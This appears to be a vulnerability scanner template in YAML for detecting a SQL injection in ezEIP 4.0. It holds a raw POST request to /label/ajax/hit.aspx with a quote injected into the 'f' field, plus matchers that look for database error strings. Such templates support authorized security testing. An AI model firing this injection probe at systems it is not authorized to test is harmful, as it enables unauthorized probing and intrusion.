id: ezeip-sqli

info:
  name: ezEIP 4.0 SQL注入
  author: Str1am
  severity: high
  reference: https://github.com/ffffffff0x/1earn/blob/27236f18098d66d7cf5c881dc70236968d5219cf/1earn/Security/RedTeam/Web%E5%AE%89%E5%85%A8/BS-Exploits.md#activemq
  tags: ezEIP,sqli

requests:
  - raw:
      - |
        POST /label/ajax/hit.aspx HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
        
        colid=3&f=hits'&itemid=6&type=0

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "SqlException"
          - "DbHelper.CurrentDb"
        part: body
        condition: and